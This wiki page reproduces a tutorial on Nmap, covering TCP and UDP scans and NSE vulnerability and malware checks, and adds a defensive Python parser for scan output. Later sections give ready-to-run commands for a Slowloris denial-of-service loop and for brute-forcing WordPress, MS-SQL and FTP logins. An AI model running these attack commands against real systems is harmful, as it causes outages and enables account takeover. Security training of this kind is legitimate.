Nmap:Penggunaan: Difference between revisions

 
One of the things we love most about Nmap is the fact that it works for both TCP and UDP protocols. And while most services run on TCP, you can also get a great advantage by scanning UDP-based services. Let’s see some examples.


Standard TCP scanning output:<syntaxhighlight lang="shell">
[root@securitytrails:~]nmap -sT 192.168.1.1
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03
Nmap scan report for 192.168.1.1
Host is up (0.58s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
80/tcp    open  http
1900/tcp  open  upnp
20005/tcp open  btx
49152/tcp open  unknown
49153/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
</syntaxhighlight>UDP scanning results using <code>-sU</code> parameter:<syntaxhighlight lang="shell">
[root@securitytrails:~]nmap -sU localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000021s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 997 closed ports
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
111/udp  open          rpcbind
5353/udp open|filtered zeroconf
</syntaxhighlight>


===13. CVE detection using Nmap===
One of Nmap’s greatest features that not all the network and systems administrators know about is something called “Nmap Scripting Engine” (known as NSE). This scripting engine allows users to use a pre-defined set of scripts, or write their own using Lua programming language.


Using Nmap scripts is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters:<syntaxhighlight lang="shell">
nmap -Pn --script vuln 192.168.1.105
</syntaxhighlight>Output example:<syntaxhighlight lang="shell">
[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible. It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1900/tcp  open  upnp
20005/tcp open  btx
49152/tcp open  unknown
49153/tcp open  unknown
</syntaxhighlight>As you can see, in this vulnerability test we were able to detect one CVE (Slowloris DOS attack).
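The scan outputs in the TCP/UDP section above and the <code>--script vuln</code> report in this section are written to be read by eye, but a defender usually needs them as data: which ports are really open, which UDP ports Nmap could not decide (<code>open|filtered</code> means the probe got no answer, so the port may be open or a firewall may have dropped the packet), which NSE scripts printed a <code>VULNERABLE:</code> block and with which CVE ids, and which scripts errored out and therefore proved nothing. The Python below is an added example written for this page; it is not code from the article or from the Nmap project. It parses Nmap's normal output format, and its sample input is constructed by merging the article's UDP and vuln output above into one combined report.

```python
"""Parse Nmap normal-format output into triage-ready findings.

Added example for this article, not code from the article or the Nmap project:
it reads the port table (including UDP's ambiguous open|filtered state) and the
per-port NSE script output that --script vuln produces.
"""
import re
from dataclasses import dataclass, field

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# NSE script line: lowercase script name, colon, then end of line or whitespace.
# "http://..." has "/" after the colon, so URLs inside script output never match.
SCRIPT_START_RE = re.compile(r"^([a-z][a-z0-9-]*):(?:\s+(.*))?$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str                                   # "open", "open|filtered", ...
    service: str
    scripts: dict = field(default_factory=dict)  # NSE script name -> output lines


@dataclass
class ScanReport:
    ports: list

    def open_ports(self):      # ports Nmap positively confirmed open
        return [p for p in self.ports if p.state == "open"]

    def unresolved_udp(self):  # UDP ports that never answered: open or filtered
        return [p for p in self.ports if p.proto == "udp" and "|" in p.state]

    def vulnerable(self):
        # (port, script, state, CVE ids) for scripts that printed a "VULNERABLE:"
        # header; a "NOT VULNERABLE:" block (vulns.showall) is not a finding.
        hits = []
        for p in self.ports:
            for name, lines in p.scripts.items():
                if "VULNERABLE:" not in lines:
                    continue
                text = "\n".join(lines)
                m = re.search(r"State:\s*(.+)", text)
                state = m.group(1).strip() if m else "VULNERABLE"
                hits.append((p.port, name, state, sorted(set(CVE_RE.findall(text)))))
        return hits

    def errors(self):          # a script that failed to run is not a clean result
        return [(p.port, name) for p in self.ports
                for name, lines in p.scripts.items() if lines[0].startswith("ERROR:")]


def parse_nmap(text):
    ports, current, script = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = PortEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4))
            ports.append(current)
            script = None
            continue
        if not line.startswith("|"):
            current = script = None  # host-level text ends any per-port script block
            continue
        if current is None:
            continue                 # pre-scan / host-script output is not per-port
        body = line[1:].lstrip("_").strip()  # drop the "|" / "|_" gutter and indent
        m = SCRIPT_START_RE.match(body)
        if m:
            script = m.group(1)
            current.scripts[script] = [m.group(2) or ""]
        elif script is not None:
            current.scripts[script].append(body)
    return ScanReport(ports)


# Constructed sample: the article's -sU and --script vuln output merged into one
# report, as a combined -sSU scan would print it (ports sorted by number).
SAMPLE = """\
Pre-scan script results:
| broadcast-avahi-dos:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
80/tcp    open          http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1900/tcp  open          upnp
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

if __name__ == "__main__":
    r = parse_nmap(SAMPLE)
    print("open:", [p.port for p in r.open_ports()],
          "udp unresolved:", [p.port for p in r.unresolved_udp()])
    print("vulnerable:", r.vulnerable(), "errors:", r.errors())
```

Two design points matter for triage. The pre-scan <code>broadcast-avahi-dos</code> block mentions CVE-2011-1002 but ends in "not vulnerable", and because it is not attached to a port it is never reported as a finding; only a script that prints the literal <code>VULNERABLE:</code> header counts. The <code>ERROR:</code> line from <code>http-vuln-cve2014-3704</code> is surfaced separately, because a check that crashed has not cleared the host, and the usual next step is to re-run that script with <code>-d</code> as the output itself suggests.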


===14. Launching DOS with Nmap===
Nmap’s features never seem to end, and thanks to the NSE it can even launch DOS attacks as part of our network testing.


In our previous example (#12) we found the host was vulnerable to Slowloris attack, and now we’ll try to exploit that vulnerability by launching a DOS attack in a forever loop:<syntaxhighlight lang="shell">
nmap 192.168.1.105 --max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
</syntaxhighlight>


===15. Launching brute force attacks===
NSE is really fascinating – it contains scripts for everything you can imagine. See the next three examples of brute force attacks against WordPress, MSSQL, and FTP servers:


WordPress brute force attack:<syntaxhighlight lang="shell">
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
</syntaxhighlight>Brute force attack against MS-SQL:<syntaxhighlight lang="shell">
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
</syntaxhighlight>FTP brute force attack:<syntaxhighlight lang="shell">
nmap --script ftp-brute -p 21 192.168.1.105
</syntaxhighlight>


===16. Detecting malware infections on remote hosts===
Nmap is able to detect malware and backdoors by running extensive tests on a few popular OS services like Identd, Proftpd, Vsftpd, IRC, SMB, and SMTP. It also has a module to check for popular malware signs inside remote servers and integrates Google’s Safe Browsing and VirusTotal databases as well.


A common malware scan can be performed by using:<syntaxhighlight lang="shell">
nmap -sV --script=http-malware-host 192.168.1.105
</syntaxhighlight>Or using Google’s Malware check:<syntaxhighlight lang="shell">
nmap -p80 --script http-google-malware infectedsite.com
</syntaxhighlight>Output example:<syntaxhighlight lang="shell">
80/tcp open http
|_http-google-malware.nse: Host is known for distributing malware.
</syntaxhighlight>Nmap is one of the most complete and accurate port scanners used by infosec professionals today. With it, you can perform simple port scan tasks or use its powerful scripting engine to launch DOS attacks, detect malware or run brute force tests on remote and local servers.


Today we covered the top fifteen Nmap commands to scan remote hosts, but there’s a lot more to discover if you’re starting to use Nmap in your OSINT strategy.
{{Note|The articles, tutorial and demo provided on Hackers Terminal is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.}}


 
==Related==
*[[Nmap]]